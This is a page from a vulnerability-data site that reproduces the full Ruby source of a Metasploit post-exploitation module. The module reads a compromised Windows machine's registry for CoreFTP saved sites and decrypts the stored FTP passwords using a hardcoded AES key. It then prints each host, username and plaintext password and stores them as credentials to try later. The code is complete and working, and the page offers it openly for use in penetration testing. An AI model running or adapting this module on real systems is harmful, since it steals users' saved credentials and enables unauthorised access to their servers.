Lucene search
K

Windows Gather CoreFTP Saved Password Extraction

🗓️ 10 Aug 2011 17:48:30Reported by theLightCosine <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 32 Views

Windows Gather CoreFTP Saved Password Extraction module in Metasploit extracts and decrypts saved passwords from CoreFTP FTP client stored in registry

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather CoreFTP Saved Password Extraction',
        'Description' => %q{
          This module extracts saved passwords from the CoreFTP FTP client. These
          passwords are stored in the registry. They are encrypted with AES-128-ECB.
          This module extracts and decrypts these passwords.
        },
        'License' => MSF_LICENSE,
        'Author' => ['theLightCosine'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ]
      )
    )
  end

  def run
    userhives = load_missing_hives
    userhives.each do |hive|
      next if hive['HKU'].nil?

      print_status("Looking at Key #{hive['HKU']}")
      begin
        subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\FTPware\\CoreFTP\\Sites")
        if subkeys.nil? || subkeys.empty?
          print_status('CoreFTP not installed for this user.')
          next
        end

        subkeys.each do |site|
          site_key = "#{hive['HKU']}\\Software\\FTPware\\CoreFTP\\Sites\\#{site}"
          host = registry_getvaldata(site_key, 'Host') || ''
          user = registry_getvaldata(site_key, 'User') || ''
          port = registry_getvaldata(site_key, 'Port') || ''
          epass = registry_getvaldata(site_key, 'PW')
          next if epass.nil? || (epass == '')

          pass = decrypt(epass)
          pass = pass.gsub(/\x00/, '') if !pass.nil? && (pass != '')
          print_good("Host: #{host} Port: #{port} User: #{user}  Password: #{pass}")

          service_data = {
            address: host,
            port: port,
            service_name: 'ftp',
            protocol: 'tcp',
            workspace_id: myworkspace_id
          }

          credential_data = {
            origin_type: :session,
            session_id: session_db_id,
            post_reference_name: refname,
            private_type: :password,
            private_data: pass,
            username: user
          }

          credential_data.merge!(service_data)

          # Create the Metasploit::Credential::Core object
          credential_core = create_credential(credential_data)

          # Assemble the options hash for creating the Metasploit::Credential::Login object
          login_data = {
            core: credential_core,
            status: Metasploit::Model::Login::Status::UNTRIED
          }

          # Merge in the service data and create our Login
          login_data.merge!(service_data)
          login = create_credential_login(login_data)
        end
      rescue StandardError
        print_error("Cannot Access User SID: #{hive['HKU']}")
      end
    end
    unload_our_hives(userhives)
  end

  def decrypt(encoded)
    cipher = [encoded].pack('H*')
    aes = OpenSSL::Cipher.new('AES-128-ECB')
    aes.decrypt
    aes.padding = 0
    aes.key = 'hdfzpysvpzimorhk'
    password = (aes.update(cipher) + aes.final).gsub(/\x00/, '')
    return password
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2023 13:47Current
0.4Low risk
Vulners AI Score0.4
32